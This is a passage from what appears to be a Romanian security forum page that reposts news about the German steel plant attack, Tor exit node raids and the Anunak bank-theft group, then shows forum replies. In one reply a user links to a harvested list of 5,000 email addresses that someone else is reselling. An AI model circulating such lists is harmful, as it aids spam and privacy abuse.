conventional IT security systems but also the specialised software used to oversee and administer the plant. BSI did not name the company operating the plant nor when the attack took place. In addition, it said it did not know who was behind the attack nor what motivated it. The attack is one of only a few on industrial systems known to have caused damage. The most widely known example of such an attack involved the Stuxnet worm which damaged centrifuges being used by Iran in its nuclear enrichment programme. Benjamin Sonntag, a software developer and digital rights activist, told Reuters: "We do not expect a nuclear power plant or steel plant to be connected to the internet. "To be computerised, but to be connected to the internet and to be hackable - that is quite unexpected," he said. Source

As foreshadowed last week, Tor network exit nodes have gone down after what appear to be raids by law enforcement authorities. Thomas White (@CthulhuSec) warned users to steer clear of his Tor servers after he lost control following what he's called "unusual activity" that meant "I have now lost control of all servers under the ISP and my account has been suspended," White wrote in an update on the Tor mailing list. "Having reviewed the last available information of the sensors, the chassis of the servers was opened and an unknown USB device was plugged in only 30-60 seconds before the connection was broken. "From experience I know this trend of activity is similar to the protocol of sophisticated law enforcement who carry out a search and seizure of running servers." White said users should treat the servers as hostile until control was regained signified by a PGP signed message from himself. He also urged them not to jump to conclusions about the identity of any possible agency nor harbour concern for the integrity of the Tor network. "If any of the mirrors or IPs do come back online, I would welcome anyone who is capable of doing so checking for any malicious code to ensure they are not used to deploy any kind of state malware or attacks against users should my theory prove to be the case," he added. Should no further updates be delivered, White said users were welcome to assume he was under a gag order. Exit nodes are the bridge between the Tor network and the public internet and funnel all forms of traffic regardless of the intent of the user. As a result they are of interest to cyber crime agencies, which occasionally raided operators suspected of assisting the distribution of child exploitation material and other net menaces. The possible raids came less than a week after White served Globe and Atlas mirrors as Tor hidden services. It also followed warnings Saturday by Tor Project leader Roger Dingledine that the network could be disrupted after a source warned of a possible raid against directory authorities which help users find relays. Tor users should note and temporarily avoid the affected mirrors below: https://globe.thecthulhu.com https://atlas.thecthulhu.com https://compass.thecthulhu.com https://onionoo.thecthulhu.com http://globe223ezvh6bps.onion http://atlas777hhh7mcs7.onion http://compass6vpxj32p3.onion 77.95.229.11 77.95.229.12 77.95.229.14 77.95.229.16 77.95.229.17 77.95.229.18 77.95.229.19 77.95.229.20 77.95.229.21 77.95.229.22 77.95.229.23 77.95.224.187 89.207.128.241 5.104.224.15 128.204.207.215 Source

Two security firms have uncovered a hacker group that has been siphoning tens of millions of dollars from bank accounts. Group-IB and Fox-IT said that the Anunak hacker group is associated with cyber theft from banks in Russia, Ukraine, Belarus and Georgia, among other countries, and from retailers in the US and Europe. "Anunak is unique in the fact that it targets banks and e-payment systems," the security firms said in a joint report (PDF). "The goal is to get into bank networks and gain access to secured payment systems. As a result, the money is stolen not from the customers, but from the bank itself." The attacks gain access to target systems through spear phishing emails, and are thought to have netted around $17m so far, most of it in the past six months. It is believed that the malware has been installed in cash machines, and could be activated at any time, according to the report. The gang has also ventured into other areas, including compromising media groups and other organisations for the purposes of industrial espionage or to gain a trading advantage on the local stock market. "We have seen criminals branching out for years, for example with point-of-sale malware," said Andy Chandler, Fox-IT's senior vice president and general manager. "Anunak has capabilities which pose threats across multiple continents and industries. It shows there's a grey area between advanced persistent threats and botnets. "The criminals' pragmatic approach once more starts a new chapter in the cybercrime ecosystem."Source

prietene iti e greu sa intelegi? Deci omul a mai pacalit cateva persoane cu acele 5k mail-uri ( vechi de prin 2009 ) chiar el mi-a recunosc ca de alea e vorba in PM. nu comenta daca nu stii.

man nu de scaner e vorba e vorba de acele mailuri 5k crede-ma stiu cine este pustiul si acele 5k mail-uri sunt PUBLICE peste tot din ( 2009 ) hai sa incheiem aici discutia nu are rost.

nu mai veniti frate aici cu cerseala + omul ofera o lista cu 5k mail-uri ce e publica a mai pacalit pe cineva asa. acel email scanner: https://mega.co.nz/#!YRYhkDKJ!DX0m37MCeweizFfQ3v2aswAKJc211SreiEUjZ7u1rNE asta e lista pe care o vinde.

@io.kent Sarbatori fericite si tie bre, o sa ne fie dor de tine...

IObit Driver Booster 2 PRO lets you easily identify and update outdated drivers. It also has built-in ability to backup/restore drive and tweak drivers to provide best gaming performance. Download: Free1-Year License IObit Driver Booster 2 PRO (100% discount)